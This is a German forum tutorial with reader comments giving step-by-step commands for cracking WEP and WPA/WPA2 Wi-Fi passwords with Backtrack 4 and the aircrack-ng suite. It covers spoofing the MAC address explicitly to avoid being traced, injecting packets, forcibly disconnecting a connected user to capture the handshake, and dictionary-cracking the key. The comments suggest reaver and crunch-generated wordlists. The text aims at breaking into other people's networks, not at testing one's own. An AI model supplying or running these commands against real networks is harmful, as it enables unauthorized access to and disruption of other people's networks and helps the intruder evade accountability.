Ich Lese in der Wireless section immer noch oft fragen wie: Wie hacke (ich kann das wort nicht austehen) ich ein wlan netz:
Um diesen Fragen Vorzubeugen schreibe ich jetzt ein Tutorial für die Dumpfbacken
1.) Laden
Man läd sich Backtrack 4 herrunter (http://www.backtrack-linux.org/)
Jenachdem Was ihr knacken wollt entweder die LiveCD oder die Version für den USB-Stick. (Darauf komme ich Später)
2.) Brennen/Installieren
Brennt den kram auf eine DVD oder – bei der USB version – installiert sie euch auf einem min. 4 GB Stick. Das sollte wirklich jeder ohne genaue anleitung können. Wenn das nicht der Fall sein sollte geht lieber wieder Sandburgen bauen.
3.) Backtrack Starten
Als allererstes bevor ihr BT startet schaltet ihr euer Note-Netbook / PC aus macht ihn an und geht mit F2 oder F12 (können auch anderre F* tasten sein je nach BIOS unterschiedlich) in das Bootmenu.
Dort stellt ihr euer CD Laufwerk oder eure USB anschlüsse an 1. stelle.
Bestätigen und nun Sollte euer PC als erstes nach Bootdateien auf dem USB-Stick oder der CD suchen.
Jetzt Startet Backtrack.
Nachdem der bootvorgang fertig ist müsst ihr
Code:
startx
eingeben um auf die Grafische oberfläche von backtrack zu kommen.
4.)Solangsam gehts Los! (WEP/WPA/2)
Öffnet eine Shell. Diese findet ihr unten Links in der „Startleiste“
(kleines Schwarzes kästchen)
Dort tippt ihr folgendes ein um herrauszufinden welcher euer Wlan Adapter ist.
Code:
airmon-ng
Falls eure Interne W-lan karte nicht erkannt wird solltet ihr euch am Besten einen Kompatieblen USB-Wlan Adapter kaufen. Eine genaue liste findet ihr wenn ihr googelt.
5.) Mac ändern
So Nachdem ihr nun wisst wie euer Wlan Adapter heißt
(bei mir ist es wlan0)
Solltet ihr eure MAC-Adresse ändern damit man euch nicht zurückverfolgen kann.
das geht so:
Code:
airmon-ng stop (euer interface bei mir wlan0) ifconfig (euer interface bei mir wlan0) down macchanger –mac (beliebige mac) (euer interface bei mir wlan0) airmon-ng start (euer interface bei mir wlan0)
Also wenn euer Interface wlan0 heißt (ich werde wlan0 – immer – jetzt als Bsp. nehmen)
Sollte das ganze so aussehen:
Code:
airmon-ng stop wlan0 ifconfig wlan0 down macchanger –mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0
6.) Jetzt gehts weiter für die die WEP knacken wollen WPA kommt gleich.
Nun tippt ihr in die gleiche shell
Code:
airodump-ng wlan0
Nun wird nach netzwerken gesucht.
Ganz links seht ihr die BSSID sozusagen die MAC-Adresse vom router
Rechts daneben PWR also Power die empfangsstärke.
Dann kommen Beacons (für uns unwichtig)
daneben befindet sich #Data (wird für ins später wichtig)
dann kommt warscheinlich CH das ist der Channel aufdem der router sendet
danach seht ihr die verschlüsselung des wlan netzes (in unserrem fall sollte es ersteinmal WEP sein)
Ganz rechts ist die ESSID der Name des Routers
Wenn das gewünsche/gesuchte Netzwerk gefunden ist drücken wir Ctrl+C um die suche anzuhalten.
Wir Kopieren uns nun die BSSID herraus.
6.) Lets Go!
Nun tippen wir
Code:
airodump-ng -c (Channel stand unter CH) -w (Filename beliebiger name zb wep) –bssid (kopierte bssid) wlan0
Jetzt werden alle empfangenen Packete in die datei wep geschrieben.
Wir öffnen eine neue Shell und lassen die alte auf.
Wir tippen in die neue Shell:
Code:
aireplay-ng -1 0 -a (Kopierte bssid) -h (Fakes MAC) -e (ESSID also der netzwerkname) wlan0
Jetzt haben wir uns beim Router „angemeldet“ wir sehen uns jetzt auf bei unserer ersten shell unten als verbunden.
Jetzt kommt #Data ins spiel. Data sind unserre verschlüsselten Packete. Wir könnten jetzt ewig warten bis diese zahl in Shell1 auf über 18.000 ist oder wir beschleunigen das ganze mit:
Code:
aireplay-ng -3 -b (bssid) -h (faked mac) wlan0
Jetzt müssen wir warten bis data über 18.000 ist das dauert ca. 2-3 min.
7.)Hack it!
Wir haben jetzt genügent packete gesammelt also können wir beide Shells schließen und eine neue aufmachen.
in diese tippt ihr ein:
Code:
aircrack-ng -n 128 -b (bssid) (filename)-01.cap
Als Bsp.
Code:
aircrack-ng -n 128 -b 00:12:32:44:D4:3F wep-01.cap
Jetzt sollte das programm Aircrack eure daten entschlüsseln und das passwort unter dem code:
Code:
Key found: (pa:ss:wo:rt)
Ausspucken.
Das passwort ist ohne doppelpunkte zu lesen.
Sollte ein Fehler auftreten könnte es sein das die verschlüsselung nur 64 bit beträngt dann in die konsole eingeben:
Code:
aircrack-ng -n 64 -b (bssid) (filename)-01.cap
8.) Das Ganze nun auch mit WPA/2
Das ganze funktioniert NUR wenn ein CLIENT mit dem router VERBUNDEN ist!!
Bis:
Zitat:
Wenn das gewünsche/gesuchte Netzwerk gefunden ist drücken wir Ctrl+C um die suche anzuhalten.
Wir Kopieren uns nun die BSSID herraus.
ist alles gleich, nur sollte unser gesuchtes netz jetzt WPA oder WPA2 verschlüsselt sein.
9.) Let`s Go!
Nachdem wir unsere BSSID nun kopiert haben suchen wir uns wie oben beschrieben auch den Channel herraus.
Mit:
Code:
airodump-ng -c (channel) -w (filename) –bssid (bssid) wlan0
Schreiben wir wieder unserre gesammelten daten in eine file..
Also Bsp:
Code:
airodump-ng -c 11 -w wpa –bssid 00:12:F3:4D:12:1A wlan0
Mit diesem befehl schreiben wir also, von unserrem wlan netz XY mit der BSSID 00:12:F3:4D:12:1A
das auf channel 11 sendet, alle empfangenen daten in das file wpa-01.cap
Anders als bei WEP kann hier anhand der gesendeten #Data nicht das passwort entschlüsselt werden.
Hierzu benötigen wir einen Handshake.
10.) Der Handshake
Ein Handshake kann man wirklich frei mit Handschlag übersetzen. Unser Client (Jemd. der mit dem Router Verbunden ist)
sendet bei einer neuanmeldung das passwort in verschlüsselter weise.
Wir könnten nun minuten oder stunden warten bis sich unser client neu verbindet. Müssen wir aber nicht.
Wir haben ja unserre Shell in der wir sehen wie das netzwerk heißt und wer verbunden ist das geschah mit dem letzten befehl.
Unten sehen wir wer verbunden ist. Wenn wir einen Handshake bekommen sehen wir das daran das ganz oben Rechts in unserrer shell Handshake! steht.
Wir öffnen nun eine neue Shell um den Clienten rauszuwerfen damit er sich neu verbinden und tippen:
Code:
aireplay-ng -0 5 -a (bssid) wlan0
Wobei 5 die anzahl ist wie oft wir das ganze versuchen möchten.
Bei dieser Methode würde unser Client nichts mitkriegen.
Nun muss es nicht zwingend notwendig sein das das ganze funktioniert da neuere router dies nicht mehr zulassen.
Wie bringen wir jetzt den Clienten zum disconnecten? Ganz einfach wir sagen dem Router: „Hallo ich bin der Nutzer und würde mich gerne Ausloggen!“
Das könnte allerdings unser Client mitkriegen jedoch wer denkt sich schon was dabei
wenn die internetverbindung flöten geht?
Also werfen wir unserren Clienten raus:
Code:
aireplay-ng -0 1 -a (bssid) -c (Client Mac) wlan0
Die Clienten Mac addresse sehen wir in Shell1 unten.
Jetzt Sollten wir einen handshake haben.
11.)Crack it!
Wir haben einen handshake und können also getrost alle unserre Shells schließen und eine neue frische aufmachen.
in diese tippen wir nun folgendes:
Code:
aircrack-ng (filename)-01.cap
Wir werden nun sehen das in der datei ein Handshake vorhanden ist.
Jetzt Brauchen wir eine Word- Combolist hier verweise ich mal auf unserre Word und Combolisten Section im board.
Wir Browsen nun zur Wordlist die sich zB hier befindet
[code][/code]/home/wordlist[code][/code]
in meinem Bsp heist meine Wordlist Words.txt
nun geben wir in die Shell folgendes ein:
Code:
aircrack-ng (filename)-01.cap -w (Pfad zu unserer Wordlist)
In meinem Bsp sollte das dan so ausehen:
Code:
aircrack-ng wpa-01.cap -w /home/wordlist/Words.txt
So und nun testet das Programm aircrack alle wörter in der liste ob diese zu dem verschlüsselten handshake passen.
Wenn das passwort gefunden ist wird es angezeigt.
Zur info mein Samsung Netbook mit 1,6 Atom Testet 900 keys die sek
Mein Thinkpad SL510 Notebook mit 2,6 dual testet 1600 keys die sek.
Sollte das entsprechende Passwort nicht in der liste sein haben wir also Pech!
9 Kommentare
Marius
Bitte andere methode als mit wordlists.
¥akuza112
du könntest es mit reaver probieren ..
–> http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/
Marius
Reaver ist gut wenn wps auf NO steht. Bei mir empfange nur signal der -70 PWR hat,das heist ich kann nicht mit Smartphone oder Tablet empfangen.Der, der -30 PWR hat, kann ich mit reaver (wash -i) finden.
Aber wenn man nicht weißt aus wieviel Zeichen und aus welchen Zeichen das Passwort besteht?
Mit welcher Methode kann ich Passwort bei WPA2 finden?
Bei WEP waren es Pakete ( Beocons) über 30000.
WPA2?
Marius
Es soll heißen nicht finden,der der -30 PWR hat.
¥akuza112
da bleibt dir dann wohl nur noch bruteforcing mit ner wordlist :/
Marius
Kannst du bitte schreiben wie ich eine erstelle.Und was ist besser mit crunch oder wordlist?
Ich hätte so gerne mit dir getroffen weil du sehr viel mehr weißt als ich,ich komme aus Düsseldorf.
¥akuza112
„was ist besser mit crunch oder wordlist?“
naja mit Crunch kannst du ja wordlists erstellen, was am Ende dann aufs Selbe hinausläuft. Wobei eine schon fertig erstellte Wordlist die schnellere Variante ist, zumindest zeitlich.
Bzgl. Treffen wirds etwas schwierig, auch wenn ich mittlerweile preisgegeben habe, dass ich aus der Nähe komme. Achte ich immernoch auf meine Privatsphäre :)
¥akuza112
Danke für deine Email, auf die erneute Frage bzgl eines Treffens, muss ich dir erneut sagen, dass ich das nicht machen werde …
¥akuza112
ansonsten kann ich dir noch dieses Forum empfehlen :
https://www.wardriving-forum.de/forum/